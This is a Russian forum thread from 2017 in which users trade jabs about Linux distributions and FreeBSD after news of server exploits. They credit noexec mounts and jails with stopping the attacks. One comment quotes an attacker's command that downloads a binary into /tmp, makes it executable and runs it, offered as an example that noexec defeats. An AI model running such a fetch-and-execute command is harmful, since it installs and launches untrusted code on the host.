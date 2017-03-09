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|1.7, vantoo, 12:42, 09/03/2017 [ответить] [смотреть все]
|–1 +/–
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Кого вообще интересуют эти Debian и RHEL/Cent OS? Кто ими вообще пользуется?
Подскажите лучше, как дела с обновлением в Alt Linux?
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|3.11, vantoo, 13:22, 09/03/2017 [^] [ответить] [смотреть все]
|+5 +/–
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Хотелось бы более конкретного и ясного ответа. Ведь миллионы серверов под Alt Linux могут быть в опасности.
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|1.12, iZEN, 13:26, 09/03/2017 [ответить] [смотреть все]
|+/–
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Судя по командам, эксплуатируемым эксплоитами, все они предназначены для управления дистрибутивами линуксов, но не FreeBSD.
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|3.22, Аноним, 15:43, 09/03/2017 [^] [ответить] [смотреть все]
|+6 +/–
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> Что лишний раз подтверждает большую распространённость FreeBSD на серверах.
Вот и гордые надуватели щёчек набежали.
Может, все дело в том, что бздюки, в отличие от некоторых излишне пафосных лапчатых, слышали о нормальных дефолтах и у них есть такие замечательные штуки, как монтирование с nonexec?
https://www.freebsd.org/cgi/man.cgi?mount(8)
Так что
[code]
cd /tmp; wget .../syn13576;chmod 777 syn13576;./syn13576
[/code]
можно делать хоть до посинения.
А еще, для апачей и прочих дыроколов есть такая вещь, как клетки. Это типа контейнера, только без той кучи дыр и оговорок, что "контейнеры вообще-то не для безопасности!".
Так что обтек… завидуйте молча.
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|4.24, Sw00p aka Jerom, 16:13, 09/03/2017 [^] [ответить] [смотреть все]
|+4 +/–
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В клетках практически всё под ro, а для нужд ПО рабочую директорию под nonexec,nosymfollow и тд, не говоря уже об урезанном мире самой клетки.
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